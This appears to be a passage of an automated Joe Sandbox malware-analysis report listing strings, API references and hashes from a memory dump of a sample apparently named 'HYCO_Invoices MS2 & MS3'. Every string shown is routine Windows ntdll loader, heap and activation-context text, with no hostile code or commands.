                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                        • Opcode ID: bc5a14386a02a523af7e92742fdff6c37659b58d6af4c8695685f53542952242
                                                                                                                                        • Instruction ID: c7af4a6ac7f4aa426cb51a8b05798e707245c686c74a9f145404801bbfcd606e
                                                                                                                                        • Opcode Fuzzy Hash: bc5a14386a02a523af7e92742fdff6c37659b58d6af4c8695685f53542952242
                                                                                                                                        • Instruction Fuzzy Hash: 2251D2712083049FD721DF25C881BAB77E8FB98B48F04092AF5C59B2A1D735E904DB93
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01062178
                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0106219F
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01062180
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01062165
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010621BF
                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01062160, 0106219A, 010621BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                        • Opcode ID: 46506e1d9e510274097b60cca11aa4af4a4859e0f54b46aa466885c1c76730e2
                                                                                                                                        • Instruction ID: 373df6c710e1745debd98b3966262aea229d57c4bc7e5d4e56ddfa1e8baec464
                                                                                                                                        • Opcode Fuzzy Hash: 46506e1d9e510274097b60cca11aa4af4a4859e0f54b46aa466885c1c76730e2
                                                                                                                                        • Instruction Fuzzy Hash: 6B310736F44335B7E721DA998C45F9E7AADEB64B50F09009AFA44BF240E3709A01D6A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 010681E5
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0102C6C3
                                                                                                                                        • LdrpInitializeProcess, xrefs: 0102C6C4
                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01068177, 010681EB
                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01068170
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01068181, 010681F5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                        • Opcode ID: e6caf0d4a5f6663f751447861ba397f258111c2e52c9f51e2e334cf3a1a536d6
                                                                                                                                        • Instruction ID: 803f0c77618a74a1b922508e12f224bb0483a7ffbc6ee022e267884ee3eaad9d
                                                                                                                                        • Opcode Fuzzy Hash: e6caf0d4a5f6663f751447861ba397f258111c2e52c9f51e2e334cf3a1a536d6
                                                                                                                                        • Instruction Fuzzy Hash: B63100717443579BD220EF28D946E5ABBD9AF94B10F040558FAC1AB291E624ED04C7A3
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 01032DF0: LdrInitializeThunk.NTDLL ref: 01032DFA
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030BA3
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030BB6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030D60
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01030D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 01028591
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01028421
                                                                                                                                        • LdrpInitializeProcess, xrefs: 01028422
                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0102855E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 010621DE
                                                                                                                                        • .Local, xrefs: 010228D8
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010622B6
                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010621D9, 010622B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RtlDeactivateActivationContext, xrefs: 01063425, 01063432, 01063451
                                                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01063437
                                                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0106342A
                                                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01063456
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                        • API String ID: 0-1245972979
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01051028
                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01050FE5
                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010510AE
                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0105106B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                        • API String ID: 0-1468400865
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0106362F
                                                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0106365C
                                                                                                                                        • LdrpFindDllActivationContext, xrefs: 01063636, 01063662
                                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01063640, 0106366C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                        • API String ID: 0-3779518884
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0105A9A2
                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0105A998
                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0105A992
                                                                                                                                        • apphelp.dll, xrefs: 01012462
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • HEAP: , xrefs: 01003264
                                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0100327D
                                                                                                                                        • HEAP[%wZ]: , xrefs: 01003255
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                        • API String ID: 0-617086771
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $@
                                                                                                                                        • API String ID: 0-1077428164
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                        • API String ID: 0-2779062949
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0105A121
                                                                                                                                        • LdrpCheckModule, xrefs: 0105A117
                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0105A10F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 00FECD63
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FECD34
                                                                                                                                        • InstallLanguageFallback, xrefs: 00FECD7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                        • API String ID: 0-1757540487
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 010682E8
                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 010682D7
                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 010682DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • @, xrefs: 010AC1F1
                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010AC1C5
                                                                                                                                        • PreferredUILanguages, xrefs: 010AC212
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • LdrpCheckRedirection, xrefs: 0107488F
                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01074888
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01074899
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01072104
                                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 010720F3
                                                                                                                                        • LdrpInitializationFailure, xrefs: 010720FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2986994758
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: #%u
                                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • LdrResSearchResource Enter, xrefs: 00FFAA13
                                                                                                                                        • LdrResSearchResource Exit, xrefs: 00FFAA25
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                        • API String ID: 0-4066393604
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: `$`
                                                                                                                                        • API String ID: 0-197956300
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • LdrpResGetMappingSize Enter, xrefs: 00FFAC6A
                                                                                                                                        • LdrpResGetMappingSize Exit, xrefs: 00FFAC7C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                                                        • API String ID: 0-1497657909
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$MUI
                                                                                                                                        • API String ID: 0-17815947
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • kLsE, xrefs: 00FF0540
                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FF063D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 00FFA309
                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 00FFA2FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID: Cleanup Group$Threadpool!
